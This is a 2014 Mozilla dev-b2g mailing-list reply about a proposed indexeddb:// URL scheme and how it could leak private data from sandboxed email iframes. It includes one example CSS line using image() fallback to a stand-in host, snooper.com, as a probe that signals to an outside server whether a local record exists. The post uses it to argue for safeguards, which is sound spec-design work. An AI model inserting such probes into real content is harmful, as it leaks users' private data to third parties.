On Sat, Apr 19, 2014 at 6:31 AM, Andrew Sutherland <[email protected]> wrote: > On 04/18/2014 08:58 PM, Jonas Sicking wrote: >> >> Another solution here would be if we added support for URLs that map >> directly into indexedDB. See >> >> http://lists.w3.org/Archives/Public/public-webapps/2013JulSep/0081.html > > > It seems like this could open new avenues for information leakage unless > URLs require JS code execution to bless them into validity using a variant > on createObjectURL or just the getURL your proposed bug magicked into > createURL/mapURL. For example... > > Hypothetically, let's say I'm an email app with a predictable db schema; > messages are stored by the uniqueish "message-id"[1] header included with > every message and known to every recipient of that message. Let's also say > my authors didn't care about user privacy too much so they display remote > images/resources by default and don't bother sanitizing them for this > reason. I, hypothetical email app, do put that HTML content in an sandboxed > iframe that forbids script from running because I'm not completely reckless. > But I do keep the iframe in my origin because in order for me to display > embedded images in the e-mail which I've saved to IndexedDB as Blobs, well, > that's what I've got to do to surface the Blobs or be able to > manipulate/interact with the iframe's HTML DOM at all after minting the > iframe and its document.
Even though you could link to resources in local databases, how would you then extract data and send it to the server? Simply displaying an image from the database could be surprising/scary to the user, but doesn't actually extract any sensitive information. However I think CSS actually would allow using a fallback syntax which would only trigger loads back to a server if a local load failed. I.e. I think something like the following <p style="background-image: image(url(indexeddb://...), url(http://snooper.com/...))"> will only send a request to snooper.com if the load from indexeddb failed. There are two ways we could handle this. We could define that doing fallback from a local url like indexeddb:// isn't allowed. This seems unfortunate as it seems like a useful feature. Another solution is to define that sandboxed pages with scripts disabled can't load from local urls. At least not unless explicitly allowed by some new sandbox flag. / Jonas _______________________________________________ dev-b2g mailing list [email protected] https://lists.mozilla.org/listinfo/dev-b2g
